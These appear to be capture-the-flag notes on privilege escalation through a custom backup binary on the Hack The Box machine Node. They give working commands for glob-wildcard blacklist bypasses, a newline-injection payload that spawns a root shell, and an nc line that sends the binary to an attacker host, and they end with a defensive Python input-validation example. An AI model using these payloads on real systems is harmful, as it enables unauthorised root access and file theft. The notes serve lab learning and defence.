binaries

You found a custom binary

"backup" example

  • From HTB Node (MongoDB box)

  • Custom app: /usr/local/bin/backup

  • Find a script that executes 'backup' and learn from it!

grep -Ri backup .               ..find references to 'backup'
find . | grep app.js            ..find our app
cat /var/www/myplace/app.js

const { spawn } = require('child_process');   // spawn is used below; import shown for context

const backup_key  = '45fac123...';            // key truncated in these notes
app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      // the web app calls the binary as: backup -q <key> <directory>
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';
      // ... rest of handler not shown in these notes
    }
});

backup -q key /dir   ..we learned how to execute!

backup /root

----------------
backup -q key /dir                                    ..how to execute!
/usr/local/bin/backup -q 45fac123... /tmp > out.txt   ..works!
base64 -d out.txt > decode-base64                     ..decode
file decode-base64                                    ..zip archive
unzip decode-base64                                   ..unzip

----------------
get root:
/usr/local/bin/backup -q 45fac123... /root > root.txt
base64 -d root.txt > /tmp/root
unzip /tmp/root    ..failed
7z x /tmp/root     ..kinda worked?
cat /tmp/root      ..failed

Avoid '/root' Filter with Splatting

----------------
Root Blocked
echo 'hello' > /tmp/root    ..decode/unzip/cat  ..fail
echo 'hello' > /tmp/*r00t   ..decode/unzip/cat  ..success

----------------
Splatting:
./backup -q secretkey /r**t/r**t.txt > root.txt
base64 -d root.txt > /tmp/secret
unzip secret
cat root/root.txt  ..success

----------------
myapp -q secretkey /r**t/r**t.txt > /tmp/encoded
myapp -q secretkey /r??t/roo?.txt > /tmp/encoded
myapp -q secretkey /r*t/r*t.txt > /tmp/encoded

Work Local

  • Send file to yourself.. You have better analysis tools!

nc $MyIP 4444 < /usr/local/bin/backup   ..send
nc -nlvp 4444 > backup            ..receive

md5sum backup                     ..confirm
chmod +x ./backup

strace

strace ./backup                    ..might be interesting
strace ./backup 1 2 3              ..works better with 3 arguments :)

ltrace ..shows the app filtering '/root', '/etc' and more
ltrace /usr/local/bin/backup -q secretkey /root/root.txt

Analyze Assembly: radare2

> r2 backup
aaa       ..analyze
afl       ..function list
vvv       ..visual mode
sym.main  ..scroll here
g g       ..get details
<space>   ..change view: nice call graph

./backup 1 2 3           ..App needs 3 Arguments!
strace ./backup 1 2 3    ..reads from /etc/myplace/keys

Analyze Assembly: binaryninja

  • Better graph view than radare2

  • But it doesn't show hex nicely

/opt/binaryninja/binaryninja

'main'  ..drill around: follow the blacklist and the trollface output
'push'  ..keyword to watch for (string constants being pushed for comparison)

Found blacklist entries: /root $ ` ; | /etc // /

PrivEsc: Newline Character

/bin/myapp -q secretkey "xxx
> /bin/bash
> xxx"
# whoami ..root!

PrivEsc: Newline Character printf

  • A newline produced by printf also works for the same bypass

------------------
printf 'hi\nNewLine\nBye'  ..gives us new lines

------------------
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/bash\nxxx')"
/bin/myapp -q secretkey "$(printf 'xxx\n/bin/sh\nxxx')"
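Why both bypasses above work, and what the fix looks like: the binary compares the path argument against literal substrings (the blacklist found in the disassembly) and then hands the still-unexpanded string to a shell, where `*`/`?` are expanded and a newline ends the command. The check below is an added example written for these notes, not code from the box or from the HTB author: `blacklist_check` mirrors the substring filter as the notes describe it (the lone `/` in the list is treated as an exact-match reject, an assumption, since a substring rule would block every absolute path), and `hardened_check` / `build_backup_argv` show the defensive version: restrict the character set, canonicalize with `realpath` before comparing, allowlist the resolved prefix, and pass the path as a single argv element so no shell ever sees it. `ALLOWED_ROOTS` and the `zip -r -` argv are assumed values for illustration.

```python
import os
import re

# Blacklist strings recovered from the binary in the notes above.
# "/" alone is handled as an exact match (assumption, see lead-in).
BLACKLIST_SUBSTRINGS = ["/root", "$", "`", ";", "|", "/etc", "//"]

# Assumed allowlist for the hardened version: the app dir and /tmp.
ALLOWED_ROOTS = ["/var/www/myplace", "/tmp"]

# Conservative character set: no glob metacharacters, quotes, whitespace or newlines.
SAFE_PATH = re.compile(r"[A-Za-z0-9._/-]+")


def blacklist_check(path: str) -> bool:
    """The weak check: accepts the path if no literal blacklisted string is present.

    It inspects the raw argument, so '/r**t' and 'xxx\\n/bin/bash\\nxxx' pass because
    the substring '/root' is simply not there; the shell does the damage afterwards.
    """
    if path == "/":
        return False
    return not any(bad in path for bad in BLACKLIST_SUBSTRINGS)


def hardened_check(path: str, allowed_roots=ALLOWED_ROOTS) -> bool:
    """The defensive check: character allowlist + canonicalize + prefix allowlist."""
    # 1. Reject anything outside a strict character set (kills *, ?, quotes, \n, $, `, ;, |).
    if not SAFE_PATH.fullmatch(path):
        return False
    # 2. Canonicalize so '..' and symlinks are resolved before we compare anything.
    real = os.path.realpath(path)
    # 3. Allow only paths that resolve to (or below) an approved root.
    for root in allowed_roots:
        root_real = os.path.realpath(root).rstrip("/")
        if real == root_real or real.startswith(root_real + "/"):
            return True
    return False


def build_backup_argv(path: str, allowed_roots=ALLOWED_ROOTS) -> list:
    """Build the argv for the archiver (assumed: 'zip -r -' writing to stdout).

    Returning a list for execve-style execution means the path is one argument:
    no glob expansion, no command splitting on newlines, no shell at all.
    """
    if not hardened_check(path, allowed_roots):
        raise ValueError("path rejected: %r" % path)
    return ["zip", "-r", "-", os.path.realpath(path)]


if __name__ == "__main__":
    # Inputs taken from the notes above, plus one ordinary path.
    samples = ["/tmp", "/root", "/r**t/r**t.txt", "xxx\n/bin/bash\nxxx"]
    for s in samples:
        print("%-24r blacklist=%-5s hardened=%s"
              % (s, blacklist_check(s), hardened_check(s)))
```

Run it and the first column shows the substring filter letting the glob and newline payloads through while the hardened check rejects them; the only thing that makes the hardened version safe in practice is the last step, executing without a shell, so a blacklist should never be the layer you rely on.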
